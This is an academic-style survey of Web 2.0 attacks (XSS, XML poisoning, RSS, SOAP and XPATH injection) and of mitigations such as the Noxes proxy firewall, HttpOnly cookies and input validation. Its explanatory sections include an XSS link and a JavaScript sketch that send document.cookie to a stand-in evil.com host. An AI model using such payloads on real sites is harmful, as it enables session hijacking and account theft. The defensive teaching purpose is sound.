The Internet and Internet-based web applications are becoming popular for performing various on-line tasks, and so are web-based vulnerabilities. Web 2.0 is today's new mantra, and much of the new work coming up is based on recent advances in web technologies, viz. XHTML, JavaScript, AJAX, SOAP and Web Services. All these technologies are fast becoming an integral part of the new generation of web applications known as Web 2.0 applications. This evolution has led to new attack vectors coming into existence around these technologies, and to combat these new threats one needs to look at different strategies as well. In this paper we look at different approaches and tools to improve security at both the server and the browser ends. Web applications often make use of JavaScript code that is embedded into web pages to support dynamic client-side behavior. This script code is executed in the context of the user's web browser. A virtual machine running within the browser limits the program to accessing only certain resources associated with the code's originating domain. However, if the user mistakenly downloads compromised or malicious JavaScript code from another website, then this code is granted full access to resources such as cookies. Such attacks are called cross-site scripting (XSS) attacks. [1]

This paper presents a brief explanation of various kinds of attacks, such as XML poisoning, RSS/Atom injection, SOAP parameter manipulation, XPATH injection and attacks exploiting client-side AJAX frameworks, and suggests various ways to mitigate such attacks on both client and server. Additionally, it suggests secure coding practices and tips which help avoid the majority of these attacks.


XSS attacks are easy to execute, but difficult to detect and prevent. The high flexibility of HTML encoding schemes offers the attacker many possibilities to evade server-side input filters that should prevent malicious scripts from being injected into trusted sites. JavaScript code is usually embedded in the HTML file or included as a separate .js file, and this code gets executed on-the-fly by the interpreter. Browsers have a secure sandboxing mechanism which restricts the code to accessing certain limited resources. JavaScript programs can also be included from different sites and are allowed to access resources from the same origin (domain). Yet even if the browser provides a proper sandboxing mechanism and enforces same-origin resource access, a script may still violate the boundary. This happens when the user is drawn or tricked into downloading JavaScript code through a cross-site scripting (XSS) attack. "Several cross-site scripting attacks have been observed recently; an example is the Yamanner worm that exploited cross-site scripting opportunities in Yahoo mail's AJAX call. Another recent example is the Samy worm that exploited MySpace.com's cross-site scripting flaw." [2]

“For example, consider the case of a user who accesses the popular trusted.com web site to perform sensitive operations. The web-based application on trusted.com uses a cookie to store sensitive session information in the user’s browser. Note that, because of the same origin policy, this cookie is accessible only to JavaScript code downloaded from a trusted.com web server. However, the user may also be browsing a malicious web site, say www.evil.com, and could be tricked into clicking on the following link:

<a href="http://www.trusted.com/<script>
document.location='http://www.evil.com/cookie.php?'+document.cookie;
</script>">Click Here</a>


The trusted.com web server receives the request and checks if it has the resource which is being requested. When the trusted.com host does not find the requested page, it will return an error message. The web server may also decide to include the requested file name in the return message to specify which file was not found. If this is the case, the file name (which is actually a script) will be sent from the trusted.com web server to the user’s browser and will be executed in the context of the trusted.com origin. When the script is executed, the cookie set by trusted.com will be sent to the malicious web site as a parameter to the invocation of the cookie.php server-side script. The cookie will be saved and can later be used by the owner of the evil.com site to impersonate the unsuspecting user with respect to trusted.com.” [1]

This paper discusses various solutions to mitigate cross-site scripting attacks. In Section 2 the various types of attacks are discussed. Section 3 discusses a client-side solution called Noxes, which acts as a web proxy and uses rules to block cross-site scripting attacks. Section 4 presents server-side solutions to detect XSS attacks. Section 5 discusses combined server- and client-side solutions for XSS. Section 6 then discusses best security practices and coding tips which help prevent most XSS attacks. Section 7 is devoted to future work and application to various other web technologies.


Wide adoption of XML has led to many forms of attacks which compromise user information. There are two ways XSS attacks are performed: stored and reflected. A stored XSS attack is a form of attack where the malicious code is permanently stored on the host (e.g., in a database table, guestbook, etc.). A reflected XSS attack is an attack in which the web server reflects the malicious code back, for example in an error message or a search result which includes some input sent to the server as part of the request. Such attacks are delivered to the user via email or as a link on a web page. [1]


All currently known XSS session hijacking attack methods can be assigned to one of the following different classes: “Session ID theft”, “Browser Hijacking” and “Background XSS Propagation”.


2.1.1 Session ID Theft: Web applications usually employ a SessionID to track the authenticated state of a user. Every request that contains this SessionID is regarded as belonging to the authenticated user. If an attacker can exploit an XSS vulnerability of the web application, he might use a malicious JavaScript to steal the user’s SessionID. It does not matter which of the methods of SessionID storage is used by the application – in all these cases the attacking script is able to obtain the SessionID. The attacking script is now able to communicate the SessionID over the internet to the attacker. As long as the SessionID is valid, the attacker is now able to impersonate the attacked client [11].
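The exfiltration step of such an attack can be sketched as follows; the attacker host and the cookie.php endpoint are illustrative, echoing the evil.com example from the introduction:

```javascript
// Sketch of the exfiltration step of a Session ID theft attack.
// The host name and endpoint (cookie.php) are illustrative only.
function buildExfilUrl(attackerHost, cookieString) {
  // The stolen cookie is simply appended as a query parameter.
  return "http://" + attackerHost + "/cookie.php?c=" +
         encodeURIComponent(cookieString);
}

// In a browser, the injected script would typically fire the request
// invisibly, e.g. via an image object:
//   new Image().src = buildExfilUrl("www.evil.com", document.cookie);
```

Because the request looks like an ordinary resource fetch, neither the user nor a conventional firewall notices the SessionID leaving the browser.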

2.1.2 Browser Hijacking: This method of session hijacking does not require the communication of the SessionID over the internet. The whole attack takes place in the victim’s browser. Modern web browsers provide the XMLHttpRequest object, which can be used to place GET and POST requests to URLs, that satisfy the same-origin policy. Instead of transferring the SessionID or other authentication credentials to the attacker, the “Browser Hijacking” attack uses this ability to place a series of http requests to the web application. The application’s server cannot differentiate between regular, user initiated requests and the requests that are placed by the script. The malicious script is therefore capable of acting under the identity of the user and commit arbitrary actions on the web application. [11]

2.1.3 Background XSS Propagation: For plain session hijacking it is sufficient that the user visits only one vulnerable page into which a malicious script has been inserted. However, other attack scenarios require the malicious JavaScript to be present on a certain webpage to work. For example, credit card information is seldom displayed in the web browser even after it has been submitted; in order to steal this information, a malicious script would have to access the HTML form that is used to enter it, which requires the script to propagate itself through the user’s session.

Propagation via iframe inclusion: In this case, the XSS attack replaces the displayed page with an iframe that takes over the whole browser window. Furthermore, the attacking script causes the iframe to display the attacked webpage, thus creating the impression that nothing has happened. As long as the user does not leave the application’s domain, the malicious script is able to monitor the user’s surfing and to include further scripts in the webpages that are displayed inside the iframe.

Propagation via pop under windows: XSS propagation can be implemented using “pop under” windows. On sufficiently fast computers users often fail to notice the opening of such an unwanted window. The attacking script opens such a window and inserts script code in the new window’s body. The new window has a link to the DOM tree of the original document (the father window) via the window.opener property. The script that was included in the new window is therefore able to monitor the user’s behavior and include arbitrary scripts in web pages of the application that are visited during the user’s session.


2.2.1 XML poisoning: [2] In a Web 2.0 application a lot of XML traffic goes back and forth between server and browser. An attacker can employ this technique to apply recursive payloads to similar-looking XML nodes multiple times. If the server’s XML handling is poor, this may result in a denial of service. Many attackers also produce malformed XML documents that can disrupt logic depending on the parsing mechanisms in use on the server. The same attack vector is also used against Web services, since they consume SOAP (XML) messages. Large-scale adoption of XML at the application layer opens up new opportunities for this attack vector.

2.2.2 RSS / Atom injection: [2] RSS feeds are a common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client-side. An attacker can inject JavaScript into an RSS feed to generate attacks on the client browser: when an end user visits the Web site and loads the page carrying the RSS feed, the malicious script gets executed.

2.2.3 Client side validation in AJAX routines: [2] Web 2.0 based applications use AJAX routines to do a lot of work on the client-side, such as client-side validation of data types, content, date fields, etc. Normally, these client-side checks must be repeated on the server-side. Most programmers fail to do so, their reasoning being the assumption that validation is taken care of in the AJAX routines. It is possible to bypass AJAX-based validation and to make POST or GET requests directly to the application, compromising a Web application’s key resources.
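Because an attacker can POST directly to the endpoint, the server must repeat every client-side check. A minimal sketch of such server-side revalidation, with illustrative field names not taken from any particular application:

```javascript
// Server-side revalidation of fields that client-side AJAX code
// also checks. Never assume the client-side checks actually ran.
function validateOrder(params) {
  const errors = [];
  // Quantity must be a positive integer.
  if (!/^[0-9]+$/.test(params.quantity) || Number(params.quantity) < 1) {
    errors.push("quantity");
  }
  // Date must be ISO formatted (YYYY-MM-DD).
  if (!/^\d{4}-\d{2}-\d{2}$/.test(params.date)) {
    errors.push("date");
  }
  return { ok: errors.length === 0, errors: errors };
}
```

The same module should be invoked for every request path that can reach the application logic, whether it originated from the AJAX front end or from a hand-crafted request.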

2.2.4 Parameter manipulation with SOAP: [2] Web services consume information and variables from SOAP messages, and it is possible to manipulate these variables. An attacker can start manipulating a node and try different injections – SQL, LDAP, XPATH, command shell – and explore possible attack vectors to get hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the Web services application open to compromise. This is a newly available attack vector for targeting Web applications running with Web services.

2.2.5 XPATH injection in SOAP message: XPATH is a querying language for XML documents; like an SQL statement, an XPATH query supplies certain parameters and fetches matching rows from the source. If an XPATH injection gets executed successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are a few known flaws in XPATH that can be leveraged by an attacker, and the only way to block this attack vector is to provide proper input validation before passing values to an XPATH statement.
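As a sketch, with an illustrative query shape not drawn from the paper, an XPATH query built by string concatenation can be subverted exactly like SQL, and a strict allowlist check applied before the value reaches the XPATH statement blocks the injection:

```javascript
// Building an XPATH query by concatenation -- the vulnerable pattern.
// An input like  ' or '1'='1  breaks out of the string literal.
function buildUserQuery(username) {
  return "//user[name/text()='" + username + "']";
}

// Allowlist validation before the value is passed to the XPATH
// statement: reject quotes and metacharacters outright (Default Deny).
function isSafeXPathValue(value) {
  return /^[A-Za-z0-9_]+$/.test(value);
}
```

Only values passing `isSafeXPathValue` should ever be handed to `buildUserQuery`; everything else is rejected rather than repaired.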

2.2.6 RIA thick client binary manipulation: [2] Rich Internet Applications (RIA) use very rich UI features such as Flash, ActiveX Controls or Applets as their primary interfaces to Web applications. At the same time since the entire binary component is downloaded to the client location, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code.


Devising a client-side solution is not easy because of the difficulty of identifying JavaScript code as being malicious. One reason is the high flexibility of HTML encoding schemes, offering the attacker many possibilities for circumventing server-side input filters that should prevent malicious scripts from being injected into trusted sites.

Noxes is a Windows-based personal firewall application that runs as a background Windows service. Typically, a personal firewall prompts the user for action if a connection request is detected which doesn’t match the firewall rules, and the user can decide to allow or block the request. Although personal firewalls play an important role in protecting users from a wide range of threats, they are ineffective against web-based client-side attacks such as XSS. This is because in a typical configuration, the personal firewall will allow the browser application to make outgoing connections to any IP address with destination port 80 (i.e., HTTP) or 443 (i.e., HTTPS). Therefore, an XSS attack that redirects a login form from a trusted web page to the attacker’s server will not be blocked.

Noxes provides an additional layer of protection that existing personal firewalls do not support. The main idea is to allow the user to exert control over the connections that the browser is making, just as personal firewalls allow a user to control the Internet connections received or originated by processes running on the local machine. Noxes operates as a web proxy that fetches HTTP requests on behalf of the user’s browser. Hence, all web connections of the browser pass through Noxes and can either be blocked or allowed based on the current security policy.

A personal web firewall, in theory, will help mitigate XSS attacks because the attacker will not be able to send sensitive information (e.g., cookie or session IDs) to a server under his control without the user’s knowledge. For example, if the attacker is using injected JavaScript to send sensitive information to the server www.evil.com, the tool will raise an alarm because no filter rule will be found for this domain. Hence, the user will have the opportunity to check the details of this connection and to cancel the request.

Every time Noxes fetches a web page on behalf of the user, it analyzes the page and extracts all external links embedded in that page. Then, temporary rules are inserted into the firewall that allow the user to follow each of these external links once. If a request being fetched is not in the local domain, Noxes then checks to see if there is a temporary filter rule for the request. If there is a temporary rule, the request is allowed. If not, Noxes checks its list of permanent rules to find a matching rule. If no rules are found matching the request, the user is prompted for action and can decide manually if the request should be allowed or blocked.
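The decision procedure described above can be sketched as follows; this is a simplification of the actual tool, with the rule representation (plain URL lists and a callback for the user prompt) assumed for illustration:

```javascript
// Simplified sketch of Noxes's per-request decision procedure.
// tempRules: one-shot allowances harvested from links in fetched pages
//            (mutated in place: a temporary rule fires only once).
// permRules: map from URL to "allow" or "block".
// askUser:   callback invoked when no rule matches.
function decideRequest(url, localDomain, tempRules, permRules, askUser) {
  const domain = new URL(url).hostname;
  if (domain === localDomain) {
    return "allow";                 // local-domain requests always pass
  }
  const idx = tempRules.indexOf(url);
  if (idx !== -1) {
    tempRules.splice(idx, 1);       // consume the one-shot rule
    return "allow";
  }
  if (url in permRules) {
    return permRules[url];
  }
  return askUser(url);              // no rule found: prompt the user
}
```

The one-shot consumption of temporary rules is the key detail: a link extracted from a fetched page may be followed once, but a script silently replaying the same external request later falls through to the prompt.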

The authors’ experimental results table shows that close to 8,000,000 links were analyzed, and that 25.98% of the links in the pages point to external domains. Their experiments show that only 5.7% of the links would have caused a connection alert. Thus, their XSS mitigation technique would have permitted the access of external links and references without requiring manual interaction in about 94.3% of the cases.


In [5] the author presents a server-side solution using static program analysis that approximates the string output of a program with a context-free grammar. The approximation obtained by the analyzer can be used to check various properties of a server-side program and the pages it generates. To demonstrate the effectiveness of the analysis, the author implemented a string analyzer for the server-side scripting language PHP. The analyzer is applied to detect cross-site scripting vulnerabilities and to validate the pages programs generate dynamically. Vulnerabilities can be detected by checking the approximation against specifications of safe or unsafe strings; for example, Web pages that do not include code executed on the client side are considered safe strings.

The analyzer takes two inputs: a PHP program and an input specification that describes the set of possible input to the program. It then generates a context-free grammar approximating the Web pages generated from the input. The analyzer is successfully applied to publicly available PHP programs to detect cross-site scripting vulnerabilities and to validate pages they generate dynamically.

To illustrate the string analysis, let us consider the following PHP program:


for ($i = 0; $i < $n; $i++)

$x = "0".$x."1";

echo $x;


The analyzer generates a context-free grammar approximating the program’s output. For this loop, the inferred language consists of strings of the form 0^n x 1^n, where x stands for the initial value of $x: each loop iteration adds one "0" on the left and one "1" on the right, so the numbers of leading 0s and trailing 1s are always balanced.


To prevent the vulnerability, a string coming from user input must be sanitized before it is embedded in a Web page. Sanitization is achieved by escaping special characters such as < and & in HTML, and by specifying rules to detect the <script> tag and similar tags, which are the prime vehicles of XSS attacks.
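A minimal sketch of such a sanitization step; the escaping set is the usual HTML one, not taken from the paper:

```javascript
// Escape HTML metacharacters so user input cannot break out of its
// text context and introduce a <script> tag or event handler.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must run first, or entities double-escape
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

Note that this escaping is only correct for HTML text and attribute-value contexts; values embedded in URLs or inline scripts need their own context-specific encoding.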



5.1 EXTRA HTTP HEADERS: [6] A typical AJAX call looks like a normal HTTP request. The following snippet shows a typical Ajax call:

GET /rss/topstory HTTP/1.1

Host: www.digg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv: Gecko/20060728





Accept-Language: en,en-us;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

A cursory glance at the request gives no indication that it was made by the XmlHttpRequest object from within the browser. However, it is possible to add an extra header to the HTTP request through XmlHttpRequest’s methods that aids in identifying and fingerprinting the Ajax call. Adding a custom header is a good starting point for securing Ajax calls, and it is possible to build a security control around this extra-header mechanism. We can add JavaScript libraries to the client-side code and use MD5 hashing and other cryptographic methods. The XmlHttpRequest object controls the POST method along with the buffer that the client sends to the server, so a secure tunnel can be built over HTTP using Ajax calls by encrypting the data along with the extra header – another option that needs to be explored.

/* Add custom header "Nonce" to the Ajax call */
http.open("GET", "/rss/topstory", true);
http.setRequestHeader("Nonce", nonce);  // nonce value computed client-side
http.send(null);


On the server side we can write rules checking all requests to /rss for the presence of the custom header “Nonce”. This can be achieved using web-server filtering tools such as mod_security for Apache, or a .NET-based HTTPModule for IIS on Windows.
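The server-side check can be sketched as a hand-rolled filter rather than a mod_security rule; the header and path names follow the example above, and the header-map shape (lower-cased keys, as Node normalizes them) is an assumption:

```javascript
// Reject requests to the /rss tree that lack the custom "Nonce"
// header set by the legitimate Ajax client code.
function allowAjaxRequest(path, headers) {
  if (!path.startsWith("/rss/")) {
    return true;                       // rule only guards the /rss tree
  }
  const nonce = headers["nonce"];      // header names lower-cased
  return typeof nonce === "string" && nonce.length > 0;
}
```

A production filter would additionally verify the nonce value itself (e.g. an MD5 hash the server can recompute), not merely its presence.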


[7] HttpOnly is a Microsoft initiative: a new attribute for cookies which prevents them from being accessed through client-side script. A cookie with this attribute is called an HTTP-only cookie. Any information contained in an HTTP-only cookie is less likely to be disclosed to a hacker or a malicious Web site. The following example is a header that sets an HTTP-only cookie.

Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

This attribute specifies that a cookie is not accessible through script. By using HTTP-only cookies, a Web site eliminates the possibility that sensitive information contained in the cookie can be sent to a hacker’s computer or Web site with script.

A cookie is set on the client with an HTTP response header. The following example shows the syntax used in this header.

Set-Cookie: <name>=<value>[; <name>=<value>]

[; expires=<date>][; domain=<domain_name>]

[; path=<some_path>][; secure][; HttpOnly]

If the HttpOnly attribute is included in the response header, the cookie is still sent when the user browses to a Web site in the valid domain. However, the cookie cannot be accessed through script in Internet Explorer 6 SP1, even by the Web site that set the cookie in the first place. This means that even if a cross-site scripting bug exists and the user is tricked into clicking a link that exploits it, Internet Explorer does not send the cookie to a third party. The information is safe.


XSS vulnerabilities are caused when a Web application returns user-supplied data back to the user without sanitizing it first. Most of the XSS attacks can be minimized by validating user input.

Input and Output Sanitization: [9] There is a standard for protecting a Web application against most attacks — validate and sanitize all user input and output without exception, based on a "Default Deny" policy. If this rule is followed thoroughly, it will eliminate the threat of XSS and SQL injection. Additionally most categories of Web application vulnerabilities can be avoided by simply following this rule. User input means not only form fields and query strings, but all input that can be influenced by the user in any way, including HTTP headers and cookies, etc. Default Deny is the superior policy to follow — nothing should be accepted as input or sent out as output by the system unless it is explicitly stipulated that it is allowed.

The application should have a central input and output validation module that strictly implements a Default Deny policy tailored to its specific needs. Some of the characters that can be used in attacks are > < ( ) [ ] ‘ " ; : – / \ NULL, etc. These characters should be sanitized or filtered whenever possible by the input validation module, and input validation should happen before the user-supplied data is used by the application. It’s also a good idea to filter out the term "script" and SQL keywords from user input, if possible.
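A minimal sketch of such a central Default Deny validator; the field names and allowed patterns are illustrative and would be tailored per application:

```javascript
// Central input validation module following a Default Deny policy:
// a value is rejected unless it matches an explicitly allowed pattern.
const ALLOWED = {
  username: /^[A-Za-z0-9_]{1,32}$/,   // illustrative patterns
  zipcode:  /^[0-9]{5}$/
};

function validateInput(field, value) {
  const pattern = ALLOWED[field];
  if (!pattern) {
    return false;                     // unknown field: deny by default
  }
  return pattern.test(value);
}
```

The crucial property is the final branch: a field with no registered pattern is denied rather than passed through, which is what distinguishes Default Deny from blacklist filtering.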

Auditing: Auditing is indispensable for keeping systems secure. The most important functions of auditing tools, such as the vulnerability scanning function, are automated. They are useful for finding both XSS and SQL injection vulnerabilities before attackers find and exploit them.

– Enable strong cryptographic protection on the forms authentication ticket. This should include both encryption and integrity support. Use SHA1 for HMAC generation and AES for encryption.

– Minimize the lifetime of the ticket as far as possible. Set the timeout attribute to a small value and disable sliding expiration to ensure a fixed expiration period.

Limit Server Responses: In many cases it may be possible to limit the amount of “personalised” data that is returned to client browsers through the use of generic responses. For example, consider a site that displays the greeting “Hello, ABC!” in response to http://trustwebsite.com/greeting.php?name=ABC. It would be a preferable security option to sacrifice this dynamic response for a hard-coded response such as “Hello, User!” [9]

Enforce Response Lengths: For the majority of applications, the developer should be able to limit the maximum length of any user-supplied strings. Although initially enforced at the client-side, all strings should also be checked at the server-side. Where possible, enforce the limitation of the maximum necessary string length by truncating any longer responses. [9]
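A sketch of the server-side length check; the limit value is illustrative:

```javascript
// Enforce a maximum string length on the server, regardless of any
// client-side limit the form may have declared.
const MAX_NAME_LENGTH = 64;   // illustrative per-field limit

function truncateToLimit(value, limit) {
  return value.length > limit ? value.slice(0, limit) : value;
}
```

Truncation bounds the size of anything reflected back to the browser, which shrinks the room an injected payload has to work with even when other filters fail.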

HTTP POST not GET: In the majority of cases, remote code insertion attacks are likely to come through the submission of user data in HTML forms. One prevention step is to ensure that form submission is only ever done through HTTP POST requests. Allowing HTTP GET request submissions would potentially allow attackers to craft distributable URLs containing the offending code. When coding the server-side application, it is extremely important to ensure that client-side data can only be received through HTTP POST variables. [8] [9]

URL Session Identifier: The use of a unique session identifier for each valid user can prevent remote exploitation of URL-based code insertion attacks. As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one. Should an attacker discover a flaw in one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session timeout, the attacker will not be able to make use of the flaw (other than affecting the attacker locally) outside of this period. For additional security, the session ID could also be made to include a hashed version (or checksum) of the client browser’s IP address. [9]


The first line of defense against XSS attacks is input filtering. As long as JavaScript code is properly stripped from all user provided strings and special characters are correctly encoded, XSS attacks are impossible.

Many XSS attack prevention techniques can also be applied to areas like the Semantic Web, a universal medium for information exchange in which documents carry computer-processable meaning. Since the Semantic Web uses XML, it is also prone to attacks such as XPATH injection, and extensions of the above methods can be applied there as well.

[10] “Taint analysis” is a method for data-flow tracking in web applications. All user-controlled data is marked as “tainted”; only when the data passes sanitizing functions does its status change to “untainted”. If a web application tries to include tainted data in a webpage, a warning is generated.


XSS vulnerabilities are being discovered and disclosed at an alarming rate. This paper presented various types of attacks on web-based application and suggested several ways of mitigating these attacks. AJAX & Web services are important technological vectors for the WEB 2.0 application space. These technologies are promising and bring new equations to the table, empowering overall effectiveness and efficiency of Web applications. With these new technologies come new security issues. Increased WEB 2.0 security awareness, secure coding practices and secure deployments offer the best defense against these new attack vectors.


[1] Engin Kirda, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic. Noxes: A client-side solution for mitigating cross-site scripting attacks. In The 21st ACM Symposium on Applied Computing (SAC 2006)

[2] Shreeraj Shah, Top 10 Web 2.0 Attack Vectors


[3] CERT, Understanding malicious content mitigation for web developers.

http://www.cert.org/tech_tips/malicious_code_mitigation.html , 2005.

[4] David Scott and Richard Sharp. Abstracting Application-Level Web Security. In Proceedings of the 11th International World Wide Web Conference (WWW 2002), May 2002.

[5] Yasuhiko Minamide. Static approximation of dynamically generated web pages. In WWW ’05: Proceedings of the 14th International Conference on World Wide Web, 2005.

[6] Shreeraj Shah, Web 2.0 defense with Ajax fingerprinting & filtering, [in]Secure Magazine. http://www.insecuremagazine.com/INSECURE-Mag-9.pdf 

[7] Microsoft MSDN, Mitigating Cross-site Scripting With HTTP-only Cookies


[8] Best Practices for Secure Development (2001) – Razvan Peteanu

[9] S.G. Masood, Best Practices


[10] Yao-Wen Huang, Fang Yu, Christian Hang, Chung-Hung Tsai, Der-Tsai Lee, and Sy-Yen Kuo. Securing web application code by static analysis and runtime protection. In Proceedings of the 13th conference on World Wide Web, pages 40–52. ACM Press, 2004.

[11] Martin Johns, SessionSafe: Implementing XSS Immune Session Handling (2006)


